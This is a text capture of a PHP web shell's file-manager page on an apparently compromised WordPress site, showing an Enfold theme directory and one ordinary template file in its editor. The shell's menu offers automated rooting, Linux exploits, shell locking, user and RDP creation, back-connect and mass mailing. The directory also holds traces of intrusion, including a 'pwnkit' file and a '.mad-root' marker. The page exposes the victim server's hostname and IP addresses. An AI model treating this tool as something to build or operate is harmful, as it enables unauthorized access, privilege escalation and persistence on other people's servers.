Linux webm002.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.121.20.2 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
5.4.45
urgencetin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
urgencetin /
www /
wp-content /
themes /
enfold /
[ HOME SHELL ]
Name
Size
Permission
Action
config-bbpress
[ DIR ]
drwxr-xr-x
config-events-calendar
[ DIR ]
drwxr-xr-x
config-gravityforms
[ DIR ]
drwxr-xr-x
config-layerslider
[ DIR ]
drwxr-xr-x
config-templatebuilder
[ DIR ]
drwxr-xr-x
config-woocommerce
[ DIR ]
drwxr-xr-x
config-wordpress-seo
[ DIR ]
drwxr-xr-x
config-wpml
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.php
72
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-more.php
181.05
KB
-rw-r--r--
archive.php
3.12
KB
-rw-r--r--
author.php
1.86
KB
-rw-r--r--
comments.php
4.98
KB
-rw-r--r--
conf.php
26.76
KB
-rw-r--r--
footer.php
6.18
KB
-rw-r--r--
forum.php
1.79
KB
-rw-r--r--
functions-enfold-interface.php
25.92
KB
-rw-r--r--
functions-enfold.php
57.34
KB
-rw-r--r--
functions.php
39.53
KB
-rw-r--r--
functions.php_bak
20.59
KB
-rw-r--r--
functions.txt
20.59
KB
-rw-r--r--
header.php
2.56
KB
-rw-r--r--
index-ajax-response.php
546
B
-rw-r--r--
index.php
2.58
KB
-rw-r--r--
page.php
1.36
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
144.35
KB
-rw-r--r--
search.php
2.12
KB
-rw-r--r--
searchform.php
1.27
KB
-rw-r--r--
sidebar.php
3.66
KB
-rw-r--r--
single-portfolio.php
1.4
KB
-rw-r--r--
single.php
2.02
KB
-rw-r--r--
style.css
1.16
KB
-rw-r--r--
tag-statement.php
546
B
-rw-r--r--
tag.php
5.98
KB
-rw-r--r--
taxonomy-portfolio_entries.php
1.78
KB
-rw-r--r--
template-archives.php
7.35
KB
-rw-r--r--
template-blank.php
647
B
-rw-r--r--
template-builder.php
2.83
KB
-rw-r--r--
wpml-config.xml
2.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : taxonomy-portfolio_entries.php
<?php if ( !defined('ABSPATH') ){ die(); } global $avia_config; /* * get_header is a basic wordpress function, used to retrieve the header.php file in your theme directory. */ get_header(); echo avia_title(array('title' => avia_which_archive())); do_action( 'ava_after_main_title' ); ?> <div class='container_wrap container_wrap_first main_color <?php avia_layout_class( 'main' ); ?>'> <div class='container'> <main class='template-page template-portfolio content <?php avia_layout_class( 'content' ); ?> units' <?php avia_markup_helper(array('context' => 'content','post_type'=>'portfolio'));?>> <div class="entry-content-wrapper clearfix"> <div class="category-term-description"> <?php echo term_description(); ?> </div> <?php $grid = new avia_post_grid(array( 'linking' => '', 'columns' => '3', 'contents' => 'title', 'sort' => 'no', 'paginate' => 'yes', 'set_breadcrumb' => false, )); $grid->use_global_query(); echo $grid->html(); ?> </div> <!--end content--> </main> <?php //get the sidebar $avia_config['currently_viewing'] = 'portfolio'; get_sidebar(); ?> </div><!--end container--> </div><!-- close default .container_wrap element --> <?php get_footer(); ?>
Close